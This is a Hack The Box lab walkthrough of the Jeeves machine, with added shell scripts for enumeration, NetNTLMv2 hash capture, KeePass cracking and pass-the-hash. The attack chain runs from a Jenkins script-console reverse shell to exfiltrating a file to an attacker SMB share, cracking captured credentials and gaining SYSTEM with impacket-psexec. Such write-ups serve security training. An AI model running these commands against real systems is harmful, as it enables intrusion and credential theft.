Hack The Box: Jeeves
Hack The Box, retired machine: Jeeves. This is a great 'medium' box that offers an interesting privilege escalation and a chance to attack Jenkins. Jenkins is an open-source automation server used for building, testing and deploying software (continuous integration / delivery, CI/CD). It is used across the industry and is likely to appear in enterprise environments, and because it exists to run build jobs, an exposed Jenkins instance is effectively a remote code execution service. Today we will exploit it.
Initial Enumeration
A quick scan of the ports to see what is exposed reveals a web server, RPC, SMB, and one port with no obvious service.
Scanning those ports more deliberately, with service and version detection, reveals an IIS server on port 80 (which also confirms the operating system is Windows) and a second web server on port 50000 running Jetty. Jetty is the servlet container that Jenkins ships with, so port 50000 is the likely home of Jenkins; port 80 serves the 'Ask Jeeves' themed page.
We should visit the IP address of the target in our browser, http://10.10.10.63 (try both HTTP and HTTPS), and see what we are returned with:
There is nothing particularly significant at face value. Our next steps: check the source code of the page (look for comments that link to other pages, or hard-coded credentials left behind from testing or building), try to fetch /robots.txt, and then begin directory brute forcing.
We are unable to find anything valuable on port 80, so it is time to shift to port 50000.
The source code reveals nothing here either, but we will fuzz for directories on this port too.
Using the wordlist shown (from the dirbuster wordlist directory on Kali) returns an interesting page.
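The two scan passes above (a fast sweep of every port, then scripts and version detection on only the open ones) and the directory brute force on both web ports, as an added example script that is not from the original writeup. It assumes nmap and gobuster are installed, that the target is 10.10.10.63, and that the wordlist is one of the dirbuster lists that ship with Kali (the author's screenshot, not reproduced here, shows the exact list used); the gnmap line inside demo_open_ports is a constructed sample, not real scan output.

```shell
#!/bin/sh
# Two-pass port scan followed by directory fuzzing. TARGET, WORDLIST and the
# choice of ports to fuzz are assumptions; nothing touches the network unless
# the script is started with the argument "run".

TARGET="${TARGET:-10.10.10.63}"
# Assumption: one of the dirbuster lists that ship with Kali.
WORDLIST="${WORDLIST:-/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt}"

# Extract the open TCP ports from an nmap grepable (-oG) output file and
# print them as the comma-separated list that nmap -p accepts.
open_ports_from_gnmap() {
    grep -o '[0-9]*/open/tcp' "$1" | cut -d/ -f1 | sort -n | uniq \
        | tr '\n' ',' | sed 's/,$//'
}

# Pass 1: every TCP port, fast, to learn what is listening.
# Pass 2: default scripts (-sC) and version detection (-sV) on those ports only,
#         which is what tells IIS on 80 apart from Jetty on 50000.
scan_target() {
    nmap -p- --min-rate 2000 -oG "quick_$1.gnmap" "$1" >/dev/null
    ports=$(open_ports_from_gnmap "quick_$1.gnmap")
    echo "[*] open ports: $ports"
    nmap -sC -sV -p "$ports" -oN "detail_$1.nmap" "$1"
}

# Directory brute force against one web port (gobuster's dir mode).
fuzz_dirs() {
    gobuster dir -u "http://$1:$2/" -w "$WORDLIST" -o "dirs_$1_$2.txt"
}

# Offline demonstration of the parser on a constructed gnmap line carrying
# the four ports a scan of this box turns up (not real scan output).
demo_open_ports() {
    tmp=$(mktemp)
    cat >"$tmp" <<'EOF'
# Nmap 7.94 scan initiated (constructed sample)
Host: 10.10.10.63 ()    Ports: 80/open/tcp//http///, 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///, 50000/open/tcp//ibm-db2///    Ignored State: filtered (65531)
EOF
    open_ports_from_gnmap "$tmp"
    rm -f "$tmp"
}

# Usage: ./enum.sh run
if [ "${1:-}" = "run" ]; then
    scan_target "$TARGET"
    fuzz_dirs "$TARGET" 80
    fuzz_dirs "$TARGET" 50000
fi
```

Feeding the first pass's open ports into the second keeps the slow script scan focused; the parser is the only part that runs without a target, which is why the demo uses a constructed gnmap line.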
Visiting the /askjeeves page, we are welcomed to the Jenkins web portal. We do not need to log in: this instance grants anonymous users full access, including to the configuration. Our next step is Manage Jenkins > Script Console, to see whether we can run arbitrary scripts that return a reverse shell to us.
Welcome to Jenkins.
The Jenkins script console runs Groovy scripts inside the Jenkins process, with whatever privileges the service has on the host, which makes it a straightforward way to execute commands. We do not have to write the payload ourselves: a site like https://www.revshells.com/ will generate a Groovy reverse shell for us. Copy it into the script console and, BEFORE running it, start a reverse shell listener with netcat:
Make sure the listener port matches the one in the generated reverse shell.
MAKE SURE you configure the payload to match your listener address and port. Also set the shell in the payload to cmd (cmd.exe) because this is a Windows target; if it were Linux we would use /bin/bash to spawn a bash session, or try other shells. Once ready, click Run and we get a low-privileged user shell:
We’re in.
This is great: we have a session on the host as the user kohsuke, and the account holds SeImpersonatePrivilege, which is an easy privilege escalation on its own (token impersonation). That is the unintended path; refer to my most recent writeup for Squid, where it is exploited. We will be doing it the intended way.
At this point we should: look through the C:\ drive and the user folders, check the networking information for a dual-NIC host (internal network, pivoting options), search for plaintext credentials stored anywhere, and so on. A good option for automated enumeration is winPEAS: https://github.com/peass-ng/PEASS-ng/blob/master/winPEAS/winPEASexe/README.md
C:\Users\kohsuke\Documents
is where we find something: a KeePass database file. KeePass is a password manager, so this is really juicy; we need to get the file back to our host machine and crack it open. This is the payoff for doing your due diligence when hunting for privilege escalation avenues.
To get this file back to our Kali machine we have a lot of options: an FTP server, netcat, SMB. I never use the SMB method so I am doing that today.
Start impacket-smbserver on the Kali machine, sharing the current working directory.
Copy the file of interest from the target to the share we created.
The target authenticating to our share also hands us a NetNTLMv2 hash.
A nice bonus: when the target connects, smbserver logs the NetNTLMv2 challenge-response of the user kohsuke. We could crack it with hashcat by putting it in a file and running: hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -O
Note that a NetNTLMv2 value is a challenge-response, not the NT hash itself: it can be cracked or relayed, but it cannot be passed. The recovered password, though, could well be reused by the local Administrator or other users; password reuse across a network is common. On to cracking our KeePass database.
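The Kali side of the exfiltration and hash capture above, as an added example that is not from the original writeup. It assumes the Kali address 10.10.14.5, a share named "share", a database file name written as a placeholder, and that hashcat and the impacket tools are installed; the smbserver log lines in demo are constructed, not a capture from the box.

```shell
#!/bin/sh
# Host a share with impacket-smbserver, pull the NetNTLMv2 hash that the
# target leaks when it connects out of the server log, and hand it to
# hashcat mode 5600. Kali IP, share name and the demo log are assumptions.

# 1. On Kali, in the directory that should receive the file
#    (-smb2support is needed for current Windows clients to connect):
#        impacket-smbserver share . -smb2support | tee smbserver.log
# 2. On the target (cmd.exe), copy the database to the share:
#        copy C:\Users\kohsuke\Documents\<db>.kdbx \\10.10.14.5\share\

# smbserver logs every client's challenge-response as
#     [*] user::DOMAIN:serverchallenge:ntproofstr:blob
# which is hashcat's NetNTLMv2 (-m 5600) input once "[*] " is stripped.
# Reads the log on stdin, prints one hash per authenticating user.
extract_ntlmv2_hashes() {
    sed -n 's/^\[\*\] \([^ :]*::[^ :]*:[0-9a-fA-F]\{16\}:[0-9a-fA-F]\{32\}:[0-9a-fA-F]*\)$/\1/p' \
        | sort -u
}

# Crack whatever was captured, then print user:password pairs.
crack_ntlmv2() {
    extract_ntlmv2_hashes < "$1" > ntlmv2.hash
    hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt -O
    hashcat -m 5600 ntlmv2.hash --show
}

# Constructed sample of smbserver's output (not a capture from the box).
demo() {
    cat <<'EOF' | extract_ntlmv2_hashes
[*] Config file parsed
[*] Incoming connection (10.10.10.63,49671)
[*] AUTHENTICATE_MESSAGE (JEEVES\kohsuke,JEEVES)
[*] User JEEVES\kohsuke authenticated successfully
[*] kohsuke::JEEVES:4141414141414141:00112233445566778899aabbccddeeff:0101000000000000c0653150de09d201
[*] Disconnecting Share(1:IPC$)
EOF
}

# Usage: ./capture_ntlmv2.sh smbserver.log
if [ -n "${1:-}" ]; then
    crack_ntlmv2 "$1"
fi
```

The regular expression is deliberately strict about the field shapes (16 hex characters of server challenge, 32 of NTProofStr) so that status lines from the server never end up in the hash file and confuse hashcat's parser.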
John the Ripper ships with a suite of conversion tools, such as keepass2john, for exactly this scenario.
Running John on the converted hash file gives us the master password of the KeePass database itself. Now we can open it with kpcli (the KeePass command-line client) on our Kali machine, or use the password on the target host if we have an RDP session, or transfer the database to another Windows host and open it there.
kpcli lets us unlock the database, and then we have a set of entries to comb through.
We have obtained a password hash.
This is great. We find a password hash in entry 0. We can display that entry, including its password field, with the show -f <ENTRY>
syntax. Now we can feed it into hashcat or john. It is an NTLM hash (hashcat mode 1000), so for cracking purposes: hashcat -m 1000 "e0fb1fb85756c24235ff238cbe81fe00" /usr/share/wordlists/rockyou.txt
Spoiler: rockyou will not crack it. That does not matter, because NTLM authentication only needs the NT hash, not the password behind it, so instead we do a Pass-the-Hash (PtH) attack with Impacket's psexec to log in as the Administrator user with the hash itself.
We are successfully logged in. psexec gives us a shell as NT AUTHORITY\SYSTEM (the SYSTEM account, one step above Administrator), so privilege escalation is complete.
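The KeePass-to-SYSTEM procedure above (keepass2john and john, then kpcli, then pass-the-hash with psexec), as an added example script that is not from the original writeup. It assumes the target 10.10.10.63, the rockyou wordlist path, that the database name is supplied as an argument, and that the LM half of the credential is the well-known empty-LM value when kpcli shows only the NT hash; the NT hash e0fb1fb85756c24235ff238cbe81fe00 is the one shown on the page.

```shell
#!/bin/sh
# From the KeePass database to SYSTEM: crack the master password, read the
# entry that holds the NTLM hash, and pass that hash to Impacket's psexec.
# TARGET, ROCKYOU and the empty-LM assumption are assumptions.

TARGET="${TARGET:-10.10.10.63}"
ROCKYOU=/usr/share/wordlists/rockyou.txt
# Hash of an empty LM password; modern Windows stores no LM hash at all, so
# this is what goes in the LM slot when only an NT hash is known.
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee

# keepass2john packs the master-key derivation parameters into one
# $keepass$ line that john's KeePass format understands.
crack_keepass() {
    keepass2john "$1" > keepass.hash
    john --wordlist="$ROCKYOU" keepass.hash
    john --show keepass.hash
}

# Interactive part, typed into kpcli with the cracked master password:
#     kpcli --kdb=<db>.kdbx
#     kpcli:/> ls
#     kpcli:/> show -f 0        # -f reveals the otherwise masked password

# Normalise what kpcli shows into the LM:NT form that psexec's -hashes
# expects: accept either "LM:NT" or a bare 32-hex NT hash. Anything else
# (a plaintext password, a truncated copy) is rejected with a non-zero
# exit rather than being sent to the target.
to_impacket_hashes() {
    case "$1" in
        *:*) lm=${1%%:*}; nt=${1#*:} ;;
        *)   lm=$EMPTY_LM; nt=$1 ;;
    esac
    printf '%s:%s\n' "$lm" "$nt" | grep -Ex '[0-9a-fA-F]{32}:[0-9a-fA-F]{32}'
}

# Try the cheap thing first (rockyou against mode 1000); if that fails,
# authenticate with the hash directly. hashcat exits 1 when the wordlist is
# exhausted without a crack, which here is the expected outcome.
pass_the_hash() {
    hashes=$(to_impacket_hashes "$1") || { echo "not an NTLM hash: $1" >&2; return 1; }
    printf '%s\n' "${hashes#*:}" > ntlm.hash
    hashcat -m 1000 ntlm.hash "$ROCKYOU" -O || true
    impacket-psexec -hashes "$hashes" "Administrator@$TARGET"
}

# Usage: ./keepass_to_system.sh <db>.kdbx
#        ./keepass_to_system.sh pth e0fb1fb85756c24235ff238cbe81fe00
case "${1:-}" in
    "")  ;;
    pth) pass_the_hash "${2:-}" ;;
    *)   crack_keepass "$1" ;;
esac
```

The validation step is there because kpcli prints the whole entry: copying the wrong field, or half of an LM:NT pair, produces a confusing authentication failure on the target, whereas a format check fails locally and immediately.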
We do not find a root.txt / proof.txt flag where we expect it. Listing the directory with dir /r (the switch that shows alternate data streams) reveals an ADS attached to the hm file.
Flag is blurred out but you have all the resources to find it.
We are able to read the contents of the real flag. Alternate Data Streams are additional named streams attached to a file on NTFS; ordinary directory listings and file viewers only show the main, unnamed stream, so an ADS is hidden at face value. PowerShell can enumerate and read the extra streams through the -Stream parameter of Get-Item and Get-Content.
Congratulations. You’ve rooted Jeeves.